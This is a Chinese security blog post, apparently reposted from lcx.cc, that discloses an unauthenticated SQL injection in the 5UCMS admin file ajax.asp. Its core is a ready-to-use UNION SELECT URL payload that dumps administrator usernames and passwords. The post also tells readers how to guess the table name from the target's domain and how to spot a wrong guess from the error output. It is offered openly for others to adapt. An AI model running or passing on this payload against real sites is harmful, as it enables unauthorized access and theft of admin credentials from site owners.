5UCMS 漏洞利用

admin 2021年4月3日19:42:02评论79 views字数 684阅读2分16秒阅读模式

By:鬼哥

有一次不小心发现了5UCMS一个小漏洞漏洞文件

后台目录/ajax.asp
因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。

我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。

ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from xxxx_Admin&id=1%20and%201=2%20UNION%20select%201%20from xxxx_Admin xxxx_Admin这个表名一般都是他们在安装的时候自定以的,一般都是用域名 比如www.xxxa.com这个站 表名可能就是xxxa_admin 大家自己修改。没什么技术含量 一般新手暴不出来所以才发出来

说实话他们的程序还是比较安全的能搞出个也不错了。对于我们这些菜鸟来说。

出现:True|False|ERR: Object required 证明表名添写错误了。

成功如下图

文章来源于lcx.cc:5UCMS 漏洞利用

相关推荐: C、C++ 控制台输出 立即输出 刷新缓冲区

VC,C,C++,控制台输出,立即输出,刷新缓冲区;C++ 立即输出、刷新缓冲区: std::cout endl = n + 刷新缓冲区 该函数在函数库 iostream 中。 文章来源于lcx.cc:C、C++ 控制台输出 立即输出 刷新缓冲区相关推荐: 贝…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:42:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   5UCMS 漏洞利用https://cn-sec.com/archives/324452.html

发表评论

匿名网友 填写信息